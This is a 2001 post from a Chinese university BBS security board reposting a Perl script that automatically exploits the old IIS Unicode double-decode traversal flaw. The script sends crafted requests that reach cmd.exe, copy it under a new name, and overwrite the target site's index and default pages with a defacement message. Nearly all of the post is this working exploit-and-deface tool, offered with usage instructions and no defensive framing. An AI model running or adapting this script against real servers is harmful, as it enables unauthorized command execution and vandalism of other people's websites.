荔园在线

荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀

[回到开始] [上一篇][下一篇]


发信人: michaelx (我这样可以吗?--睡觉), 信区: Security
标  题:   PoizonB0x自动黑uincode漏洞的pl程序
发信站: 荔园晨风BBS站 (Sun Sep  9 09:50:19 2001), 转信

PoizonB0x自动黑uincode漏洞的pl程序
----------------------------------------------------------------------------
----
#!/usr/bin/perl
use IO::Socket;
# 16/5/01
# Leon's|pb0x Auto exploiter for the Windows decode Vuln
# Usage: perl autoexp.pl host
# This will deface a site with "PoizonB0x Ownz YA"
# It can be modified to display a different defacement or
# to search for an index file in more places.
# PoizonB0x Crew
# poizonb0x.org
#####################################################
@urls = ("GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+copy+c:\\winn
t\\system32\\cmd.exe+leon.exe HTTP/1.0\n\n",
"GET /scripts/leon.exe?/c+echo+PoizonB0x Ownz YA+>+c:\\inetpub\\wwwroot\\def
ault.asp HTTP/1.0\n\n",
"GET /scripts/leon.exe?/c+echo+PoizonB0x Ownz YA+>+c:\\inetpub\\wwwroot\\def
ault.htm HTTP/1.0\n\n",
"GET /scripts/leon.exe?/c+echo+PoizonB0x Ownz YA+>+c:\\inetpub\\wwwroot\\ind
ex.htm  HTTP/1.0\n\n",
"GET /scripts/leon.exe?/c+echo+PoizonB0x Ownz YA+>+c:\\inetpub\\wwwroot\\ind
ex.html  HTTP/1.0\n\n",
"GET /scripts/leon.exe?/c+echo+PoizonB0x Ownz YA+>+d:\\inetpub\\wwwroot\\ind
ex.htm  HTTP/1.0\n\n",
"GET /scripts/leon.exe?/c+echo+PoizonB0x Ownz YA+>+d:\\inetpub\\wwwroot\\ind
ex.html  HTTP/1.0\n\n",
"GET /scripts/leon.exe?/c+echo+PoizonB0x Ownz YA+>+d:\\inetpub\\wwwroot\\def
ault.asp  HTTP/1.0\n\n",
"GET /scripts/leon.exe?/c+echo+PoizonB0x Ownz YA+>+d:\\inetpub\\wwwroot\\def
ault.htm HTTP/1.0\n\n");
######################################################
$hostlength = 1;
$hostcount = 0;
while ($hostcount < $hostlength) {
$victim = $ARGV[0];
$port = 80;
&connect;
################ connect ####################
sub connect {
        print "[Trying $victim]\n";
$sock = IO::Socket::INET->new(PeerAddr => $victim,
  PeerPort => $port,
  Proto => 'tcp');
if ($sock) {
print "[Connected to $victim on $port]\n";
            $n=0;
foreach $urls(@urls)
{
&go;
}
    close(sock);
      } else {
}
}
######## go ########
sub go {
my($iaddr,$paddr,$proto);
$iaddr = inet_aton($victim) || die "Error";
$paddr = sockaddr_in($port, $iaddr) || die "Error";
$proto = getprotobyname('tcp') || die "Error";
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die "Error: the line 182 repai
r";
connect(SOCK, $paddr) || die "Unable to connect";
send(SOCK,$urls,0);
print "$urls\n";
$check=<SOCK>;
}
$hostcount++;
}
# poizonb0x@linuxmail.org #

--
※ 来源:·荔园晨风BBS站 bbs.szu.edu.cn·[FROM: 203.93.19.1]


[回到开始] [上一篇][下一篇]

荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店